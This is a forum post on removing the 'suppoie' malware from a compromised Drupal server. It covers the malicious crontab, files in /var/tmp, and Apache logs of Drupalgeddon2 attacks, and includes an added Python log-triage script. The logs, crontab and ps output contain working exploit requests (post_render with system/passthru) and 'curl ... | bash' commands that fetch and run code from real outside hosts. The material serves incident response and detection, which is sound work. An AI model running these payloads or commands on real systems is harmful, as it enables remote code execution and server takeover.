Linux Suppoie Drupal Removal

Jackbox

Active Member
Jan 2, 2016
Detecting this
  • cd /var/tmp; ls -la
  • Notice the user/group, as this is how the crontab was set up.
For example, if you see:
Code:
[root@XXXX tmp]# cd /var/tmp;ls -la
total 704
drwxrwxrwt.  2 root   root    4096 Apr 24 18:22 .
drwxr-xr-x. 23 root   root    4096 Aug  6  2013 ..
-rw-r--r--   1 apache admin   2006 May  2 11:21 config.json
-rwxrwxrwx   1 apache admin 707863 May  2 11:14 suppoie

Notice how suppoie is under the user apache.

So then you could enter:
Code:
sudo crontab -e -u apache

I am going to remove:
Code:
* * * * * curl -s http://azadarimarkaz.com/logo7.jpg | bash -s

Now we need to take care of the files inside /var/tmp.

The config.json file listed above will be owned by the same user (apache in our case). Other times this user is www-data or similar. We will remove two files from /var/tmp.

Code:
rm config.json suppoie

Code:
158.69.133.31 - - [29/Apr/2018:16:01:59 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [29/Apr/2018:16:02:00 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [29/Apr/2018:16:02:50 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [29/Apr/2018:16:02:51 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [29/Apr/2018:16:26:40 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [29/Apr/2018:16:26:40 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [29/Apr/2018:18:16:48 -0400] "GET /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [29/Apr/2018:18:16:49 -0400] "GET /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [01/May/2018:05:06:14 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [01/May/2018:05:06:14 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [01/May/2018:05:06:17 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [01/May/2018:05:06:17 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [15/Apr/2018:18:02:24 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23929 "-" "python-requests/2.18.4"
158.69.133.31 - - [15/Apr/2018:18:02:26 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23929 "-" "python-requests/2.18.4"
158.69.133.31 - - [16/Apr/2018:17:38:05 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23929 "-" "python-requests/2.18.4"
158.69.133.31 - - [16/Apr/2018:17:38:06 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23929 "-" "python-requests/2.18.4"
158.69.133.31 - - [19/Apr/2018:02:57:40 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [19/Apr/2018:02:57:41 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [19/Apr/2018:03:43:26 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [19/Apr/2018:03:43:26 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [19/Apr/2018:12:16:55 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [19/Apr/2018:12:16:55 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [19/Apr/2018:22:47:30 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [19/Apr/2018:22:47:31 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:00:44:22 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:00:44:23 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:16:51:18 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:16:51:18 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:16:53:44 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:16:53:44 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [20/Apr/2018:18:54:59 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [20/Apr/2018:18:55:00 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [21/Apr/2018:13:21:33 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [21/Apr/2018:13:21:34 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [21/Apr/2018:14:08:44 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [21/Apr/2018:14:08:44 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [21/Apr/2018:14:14:08 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [21/Apr/2018:14:14:08 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [21/Apr/2018:15:51:36 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [21/Apr/2018:15:51:36 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [21/Apr/2018:16:53:55 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [21/Apr/2018:16:53:56 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [21/Apr/2018:23:37:27 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [21/Apr/2018:23:37:27 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [23/Apr/2018:01:40:04 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [23/Apr/2018:01:40:04 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [25/Apr/2018:01:25:17 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [25/Apr/2018:01:25:17 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [25/Apr/2018:01:27:02 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [25/Apr/2018:01:27:02 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [25/Apr/2018:01:27:26 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [25/Apr/2018:01:27:26 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [25/Apr/2018:03:45:21 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [25/Apr/2018:03:45:22 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [26/Apr/2018:17:46:27 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [26/Apr/2018:17:46:28 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [26/Apr/2018:17:46:28 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [26/Apr/2018:17:46:28 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [26/Apr/2018:17:48:46 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [26/Apr/2018:17:48:46 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [26/Apr/2018:17:49:23 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [26/Apr/2018:17:49:23 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [26/Apr/2018:20:00:32 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [26/Apr/2018:20:00:32 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [27/Apr/2018:23:27:51 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [27/Apr/2018:23:27:52 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [27/Apr/2018:23:59:49 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [27/Apr/2018:23:59:49 -0400] "POST /ps.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [28/Apr/2018:01:09:42 -0400] "GET /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [28/Apr/2018:01:09:43 -0400] "GET /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [29/Apr/2018:15:25:56 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [29/Apr/2018:15:25:57 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [29/Apr/2018:15:26:03 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [29/Apr/2018:15:26:04 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [29/Apr/2018:15:47:39 -0400] "POST /ps.php HTTP/1.1" 302 -
158.69.133.31 - - [29/Apr/2018:15:47:39 -0400] "POST /ps.php HTTP/1.1" 302 -
158.69.133.31 - - [01/May/2018:04:29:02 -0400] "POST /ps.php HTTP/1.1" 302 -
158.69.133.31 - - [01/May/2018:04:29:03 -0400] "POST /ps.php HTTP/1.1" 302 -
158.69.133.31 - - [01/May/2018:04:29:10 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [01/May/2018:04:29:11 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [15/Apr/2018:18:02:34 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23943
158.69.133.31 - - [15/Apr/2018:18:02:35 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23943
158.69.133.31 - - [18/Apr/2018:23:17:14 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23943
158.69.133.31 - - [18/Apr/2018:23:17:16 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23943
158.69.133.31 - - [20/Apr/2018:16:26:09 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [20/Apr/2018:16:26:09 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [20/Apr/2018:16:30:24 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [20/Apr/2018:16:30:25 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [21/Apr/2018:12:43:57 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [21/Apr/2018:12:43:57 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [21/Apr/2018:13:47:50 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [21/Apr/2018:13:47:50 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [21/Apr/2018:13:47:51 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [21/Apr/2018:13:47:51 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [23/Apr/2018:01:04:14 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [23/Apr/2018:01:04:14 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [23/Apr/2018:22:08:33 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613
158.69.133.31 - - [23/Apr/2018:22:08:33 -0400] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo%20YCRACFZQ HTTP/1.1" 200 25074
158.69.133.31 - - [23/Apr/2018:22:08:34 -0400] "POST /?q=file/ajax/name/%23value/form-wwnz2VlGib1c30rourfLnqE4STxWpRRg4blk4vEGQew HTTP/1.1" 200 -
158.69.133.31 - - [23/Apr/2018:22:08:34 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613
158.69.133.31 - - [24/Apr/2018:19:35:07 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613
158.69.133.31 - - [24/Apr/2018:19:35:07 -0400] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo%20IDIGOSMV HTTP/1.1" 200 25074
158.69.133.31 - - [24/Apr/2018:19:35:08 -0400] "POST /?q=file/ajax/name/%23value/form-b74ZyRbU0FSIK7VVUgrWzVOxOFOkiSejGhKR2Us1X-c HTTP/1.1" 200 -
158.69.133.31 - - [24/Apr/2018:19:35:08 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613
158.69.133.31 - - [24/Apr/2018:21:16:46 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613
158.69.133.31 - - [24/Apr/2018:21:16:46 -0400] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo%20GITILURK HTTP/1.1" 200 25074
158.69.133.31 - - [24/Apr/2018:21:16:47 -0400] "POST /?q=file/ajax/name/%23value/form-ygTPrNJNU_hZhAPCDwHtO_zKjfYP6Doo06VhjU5NVwI HTTP/1.1" 200 -
158.69.133.31 - - [24/Apr/2018:21:16:47 -0400] "POST /CHANGELOG.txt HTTP/1.1" 200 111613
158.69.133.31 - - [26/Apr/2018:17:12:12 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [26/Apr/2018:17:12:12 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [26/Apr/2018:17:12:12 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [26/Apr/2018:17:12:12 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [26/Apr/2018:17:12:29 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [26/Apr/2018:17:12:30 -0400] "POST /loikfd.php HTTP/1.1" 302 -
158.69.133.31 - - [27/Apr/2018:22:49:56 -0400] "POST /ps.php HTTP/1.1" 302 -
158.69.133.31 - - [27/Apr/2018:22:49:57 -0400] "POST /ps.php HTTP/1.1" 302 -
158.69.133.31 - - [27/Apr/2018:23:21:54 -0400] "POST /ps.php HTTP/1.1" 302 -
158.69.133.31 - - [27/Apr/2018:23:21:54 -0400] "POST /ps.php HTTP/1.1" 302 -

....

Code:
[root@XXXX httpd]# cat * | grep "logo7.jpg"
185.169.255.18 - - [29/Apr/2018:20:39:02 -0400] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://azadarimarkaz.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 25257
86.127.10.162 - - [01/May/2018:11:00:24 -0400] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://azadarimarkaz.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 25257
81.92.203.123 - - [24/Apr/2018:18:22:34 -0400] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 25249
81.92.203.123 - - [24/Apr/2018:22:20:01 -0400] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 25249
185.38.150.119 - - [25/Apr/2018:11:46:21 -0400] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 25249
185.38.150.119 - - [25/Apr/2018:21:08:22 -0400] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://yourvideoshare.net/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 25261
185.38.150.119 - - [25/Apr/2018:21:08:34 -0400] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://yourvideoshare.net/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 25261
79.117.205.160 - - [28/Apr/2018:02:40:05 -0400] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://62.210.88.83/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 25237
79.117.205.160 - - [28/Apr/2018:03:00:44 -0400] "POST //user/password/?name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://62.210.88.83/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 25219
[29/Apr/2018:20:39:02 -0400] 185.169.255.18 TLSv1 DHE-RSA-AES128-SHA "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://azadarimarkaz.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 25257
[01/May/2018:11:00:24 -0400] 86.127.10.162 TLSv1 DHE-RSA-AES128-SHA "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://azadarimarkaz.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 25257
[24/Apr/2018:18:22:34 -0400] 81.92.203.123 TLSv1 DHE-RSA-AES128-SHA "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 25249
[24/Apr/2018:22:20:01 -0400] 81.92.203.123 TLSv1 DHE-RSA-AES128-SHA "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 25249
[25/Apr/2018:11:46:21 -0400] 185.38.150.119 TLSv1 DHE-RSA-AES128-SHA "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 25249
[25/Apr/2018:21:08:22 -0400] 185.38.150.119 TLSv1 DHE-RSA-AES128-SHA "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://yourvideoshare.net/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 25261
[25/Apr/2018:21:08:34 -0400] 185.38.150.119 TLSv1 DHE-RSA-AES128-SHA "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://yourvideoshare.net/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 25261
[28/Apr/2018:02:40:05 -0400] 79.117.205.160 TLSv1 DHE-RSA-AES128-SHA "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://62.210.88.83/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 25237
[28/Apr/2018:03:00:44 -0400] 79.117.205.160 TLSv1 DHE-RSA-AES128-SHA "POST //user/password/?name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://62.210.88.83/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 25219
[root@XXXX httpd]#

More logs to inspect:

Interesting Drupal attacks out there. Pretty sure it is implied, but patch your Drupal: https://www.drupal.org/security
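As an added example (not code from the post), here is a Python triage of Apache access logs in the shapes shown above: it tags the Drupalgeddon2 request patterns, decodes the name[#markup] string from the post_render requests so the injected command is visible in clear, and lists every path a flagged IP touched. The tag names are my own labels and the sample lines are constructed from the patterns in the post.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote

# Apache combined format; the trailing referer/user-agent pair is optional so the
# shorter lines on the page (ending in the response size) parse as well.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

def parse_line(line):
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def classify(rec):
    """Indicator tags (our own labels) for one request; an empty list means nothing notable."""
    tags = []
    path = unquote(rec["path"])
    if "drupalgeddon2" in (rec.get("ua") or "").lower():
        tags.append("scanner-ua")
    # Drupal 8 shape: /user/register with element_parents=account/mail/#value
    if "/user/register" in path and "element_parents=account/mail/#value" in path:
        tags.append("d8-register-probe")
    # Drupal 7 shape: user/password with name[#post_render][] pointing at a PHP exec function
    if "user/password" in path and "#post_render" in path:
        tags.append("d7-post_render")
    return tags

def injected_command(rec):
    """(callback, command) from a post_render request: name[#markup] is the string handed to the callback."""
    params = parse_qs(rec["path"].partition("?")[2])   # decodes %23 -> '#', %20 -> ' ' exactly once
    callback = params.get("name[#post_render][]", [None])[0]
    command = params.get("name[#markup]", [None])[0]
    return (callback, command) if command else None

def triage(lines):
    """Per source IP that tripped an indicator: hit count, tags, decoded commands, every path touched."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)
    report = {}
    for ip, recs in by_ip.items():
        tags, commands = set(), set()
        for rec in recs:
            t = classify(rec)
            tags.update(t)
            cmd = injected_command(rec) if "d7-post_render" in t else None
            if cmd:
                commands.add(cmd)
        if tags:
            # Pivot: once an IP is flagged, list everything else it requested (the repeated
            # POSTs to unfamiliar .php files in the post's logs show up here).
            report[ip] = {"hits": len(recs), "tags": tags, "commands": commands,
                          "paths": sorted({r["path"].partition("?")[0] for r in recs})}
    return report

# Constructed sample in the shapes seen in the post's logs.
SAMPLE_LOG = """\
158.69.133.31 - - [29/Apr/2018:16:01:59 -0400] "POST /loikfd.php HTTP/1.1" 302 - "-" "curl/7.47.0"
158.69.133.31 - - [29/Apr/2018:18:16:48 -0400] "GET /CHANGELOG.txt HTTP/1.1" 200 111613 "-" "drupalgeddon2"
158.69.133.31 - - [15/Apr/2018:18:02:24 -0400] "POST /user/register?element_parents=account%2Fmail%2F%23value&_wrapper_format=drupal_ajax&ajax_form=1 HTTP/1.1" 403 23929 "-" "python-requests/2.18.4"
158.69.133.31 - - [23/Apr/2018:22:08:33 -0400] "POST /?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=echo%20YCRACFZQ HTTP/1.1" 200 25074
185.169.255.18 - - [29/Apr/2018:20:39:02 -0400] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://azadarimarkaz.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 25257
"""

if __name__ == "__main__":
    for ip, info in triage(SAMPLE_LOG.splitlines()).items():
        print(ip, info["hits"], sorted(info["tags"]), sorted(info["commands"]), info["paths"])
```

Run it over `cat /var/log/httpd/*access* | python3 triage.py` style input by replacing SAMPLE_LOG with sys.stdin; the 403 on the Drupal 8 probe versus the 200 on the Drupal 7 post_render requests is the first thing to compare.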

Jackbox

Ultimately, it looks like this in ps aux.

Code:
apache   15666  0.0  0.0   9228  1052 ?        Ss   16:07   0:00 /bin/sh -c curl -s http://azadarimarkaz.com/logo7.jpg | bash -s
apache   15667  0.0  0.0  75604  2092 ?        S    16:07   0:00 curl -s http://azadarimarkaz.com/logo7.jpg
apache   15668  0.0  0.0   9228   980 ?        S    16:07   0:00 bash -s
 